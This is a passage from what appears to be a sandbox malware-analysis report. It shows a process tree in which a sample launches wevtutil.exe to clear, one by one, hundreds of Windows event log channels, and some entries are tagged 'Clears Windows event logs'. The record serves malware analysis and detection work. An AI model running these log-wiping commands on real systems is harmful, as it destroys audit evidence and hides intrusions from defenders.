- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    - Clears Windows event logs
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    - Clears Windows event logs
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    - Clears Windows event logs
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    - Clears Windows event logs
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    - Clears Windows event logs
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    - Clears Windows event logs
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    - Clears Windows event logs
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    - Clears Windows event logs
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    - Clears Windows event logs
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    - Clears Windows event logs
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    - Clears Windows event logs
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    - Clears Windows event logs
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    - Clears Windows event logs
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:1016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:1180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    - Clears Windows event logs
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:1628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:1396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:1780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    - Clears Windows event logs
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:1180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    - Clears Windows event logs
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:1240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:2000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:1984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:1396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
    3⤵
    - Clears Windows event logs
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:1780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
